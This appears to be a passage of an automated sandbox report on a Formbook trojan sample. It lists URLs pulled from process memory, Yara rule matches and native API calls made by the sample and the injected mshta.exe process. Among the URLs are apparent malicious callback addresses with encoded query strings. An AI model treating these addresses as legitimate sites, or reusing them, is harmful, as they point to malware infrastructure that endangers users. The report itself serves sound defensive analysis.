          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIoaomQNQcsA88c7O9yZ4KMCoOg4Ko50yyygA.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIoaomQNQcsA88c7O9yZ4KMCoOg4Ko70yyygA.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIuaomQNQcsA88c7O9yZ4KMCoOg4Koz4y6qhA.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIuaomQNQcsA88c7O9yZ4KMCoOg4Koz4yCqhMva.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIuaomQNQcsA88c7O9yZ4KMCoOg4Koz4yGqhMva.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIuaomQNQcsA88c7O9yZ4KMCoOg4Koz4yOqhMva.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://helpdesk.atom.com/en/articles/389625-trademark-research-service7
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://helpdesk.atom.com/squadhelp-services/trademark-filing-package
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://iframe.mediadelivery.net/embed/239474/327efcdd-b1a2-4891-b274-974787ae8362?autoplay=false&am
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: mshta.exe, 00000003.00000003.1800765485.0000000008113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_deskt&
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033J
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: mshta.exe, 00000003.00000002.3916202013.000000000562E000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.00000000046AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.amitayush.digital/5ab9/?mnYxMt=RKfYqv7dLSd52zuw9p6x496tTBAgi3kUigLPO7fV9fYs6caX5nN0t2Amz
          Source: tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/assets/images/atom-favicon.png
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/assets/imgs/domainwall.jpg
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/auctions
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/audience-testing
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/blog/
          Source: tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/blog/discover-atom/
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/brand-alignment
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/brand-identity-design
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/branding-marketing-naming-contests
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/branding-marketing-naming-contests/all
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/business-name-generator
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/connect
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/domain-appraisal
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/domain-name-generator
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/free-trademark-search
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/how-it-works
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/join-as-creative
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/logos
          Source: tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/managed-contests
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/our-work
          Source: tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale/all
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale/all/length/3%20Letters
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale/all/length/4%20Letters
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale/all/length/5%20Letters
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale/all/length/Short
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale/all/type_of_name/One%20Word
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale/all?gad_source=1&gbraid=0AAAAA9U6Xp5HmCDhlFsY-Vzi86oc7
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/pricing
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/public/images/build_brand/icon-arrow-long-right.svg);
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/public/images/logo.svg
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/radar/
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/start-contest
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/startups
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/taglines
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/testimonials-feedback
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/ultra-premium-marketplace/all
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/winners
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/youtube-name-generator
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: firefox.exe, 00000007.00000002.1912289226.0000000005864000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.strikingly.com/?utm_source=404&utm_medium=internal&utm_campaign=404_redirect
          Source: mshta.exe, 00000003.00000002.3916202013.0000000004CC2000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.0000000003D42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.tmstore.click/qmcg/?mnYxMt=67IAuCDTBw5QZph6u0mJLa046OmMvBYKYaPJ7pOH3jPtJouGJ8FP

          E-Banking Fraud

          Source: Yara matchFile source: 0.2.wavjjT3sEq.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 0.2.wavjjT3sEq.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0014C8B3 NtClose,0_2_0014C8B3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00121A70 NtProtectVirtualMemory,0_2_00121A70
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962B60 NtClose,LdrInitializeThunk,0_2_01962B60
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_01962DF0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01962C70
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019635C0 NtCreateMutant,LdrInitializeThunk,0_2_019635C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01964340 NtSetContextThread,0_2_01964340
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01964650 NtSuspendThread,0_2_01964650
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962B80 NtQueryInformationFile,0_2_01962B80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962BA0 NtEnumerateValueKey,0_2_01962BA0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962BF0 NtAllocateVirtualMemory,0_2_01962BF0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962BE0 NtQueryValueKey,0_2_01962BE0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962AB0 NtWaitForSingleObject,0_2_01962AB0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962AD0 NtReadFile,0_2_01962AD0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962AF0 NtWriteFile,0_2_01962AF0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962DB0 NtEnumerateKey,0_2_01962DB0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962DD0 NtDelayExecution,0_2_01962DD0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962D10 NtMapViewOfSection,0_2_01962D10
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962D00 NtSetInformationFile,0_2_01962D00
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962D30 NtUnmapViewOfSection,0_2_01962D30
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962CA0 NtQueryInformationToken,0_2_01962CA0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962CC0 NtQueryVirtualMemory,0_2_01962CC0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962CF0 NtOpenProcess,0_2_01962CF0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962C00 NtQueryInformationProcess,0_2_01962C00
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962C60 NtCreateKey,0_2_01962C60
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962F90 NtProtectVirtualMemory,0_2_01962F90
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962FB0 NtResumeThread,0_2_01962FB0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962FA0 NtQuerySection,0_2_01962FA0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962FE0 NtCreateFile,0_2_01962FE0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962F30 NtCreateSection,0_2_01962F30
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962F60 NtCreateProcessEx,0_2_01962F60
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962E80 NtReadVirtualMemory,0_2_01962E80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962EA0 NtAdjustPrivilegesToken,0_2_01962EA0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962EE0 NtQueueApcThread,0_2_01962EE0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01962E30 NtWriteVirtualMemory,0_2_01962E30
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01963090 NtSetValueKey,0_2_01963090
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01963010 NtOpenDirectoryObject,0_2_01963010
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_019639B0 NtGetContextThread,0_2_019639B0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01963D10 NtOpenProcessToken,0_2_01963D10
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Code function: 0_2_01963D70 NtOpenThread,0_2_01963D70
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03824340 NtSetContextThread,LdrInitializeThunk,3_2_03824340
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03824650 NtSuspendThread,LdrInitializeThunk,3_2_03824650
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_03822BA0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822BE0 NtQueryValueKey,LdrInitializeThunk,3_2_03822BE0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03822BF0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822B60 NtClose,LdrInitializeThunk,3_2_03822B60
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822AD0 NtReadFile,LdrInitializeThunk,3_2_03822AD0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822AF0 NtWriteFile,LdrInitializeThunk,3_2_03822AF0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822FB0 NtResumeThread,LdrInitializeThunk,3_2_03822FB0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822FE0 NtCreateFile,LdrInitializeThunk,3_2_03822FE0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822F30 NtCreateSection,LdrInitializeThunk,3_2_03822F30
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_03822E80
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822EE0 NtQueueApcThread,LdrInitializeThunk,3_2_03822EE0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822DD0 NtDelayExecution,LdrInitializeThunk,3_2_03822DD0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03822DF0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822D10 NtMapViewOfSection,LdrInitializeThunk,3_2_03822D10
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_03822D30
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_03822CA0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822C60 NtCreateKey,LdrInitializeThunk,3_2_03822C60
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03822C70
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_038235C0 NtCreateMutant,LdrInitializeThunk,3_2_038235C0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_038239B0 NtGetContextThread,LdrInitializeThunk,3_2_038239B0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822B80 NtQueryInformationFile,3_2_03822B80
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822AB0 NtWaitForSingleObject,3_2_03822AB0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822F90 NtProtectVirtualMemory,3_2_03822F90
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822FA0 NtQuerySection,3_2_03822FA0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822F60 NtCreateProcessEx,3_2_03822F60
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822EA0 NtAdjustPrivilegesToken,3_2_03822EA0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822E30 NtWriteVirtualMemory,3_2_03822E30
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822DB0 NtEnumerateKey,3_2_03822DB0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822D00 NtSetInformationFile,3_2_03822D00
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822CC0 NtQueryVirtualMemory,3_2_03822CC0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822CF0 NtOpenProcess,3_2_03822CF0
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03822C00 NtQueryInformationProcess,3_2_03822C00
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03823090 NtSetValueKey,3_2_03823090
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03823010 NtOpenDirectoryObject,3_2_03823010
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03823D10 NtOpenProcessToken,3_2_03823D10
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_03823D70 NtOpenThread,3_2_03823D70
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_02F59210 NtCreateFile,3_2_02F59210
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_02F59380 NtReadFile,3_2_02F59380
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_02F59680 NtAllocateVirtualMemory,3_2_02F59680
          Source: C:\Windows\SysWOW64\mshta.exe Code function: 3_2_02F59470 NtDeleteFile,3_2_02F59470
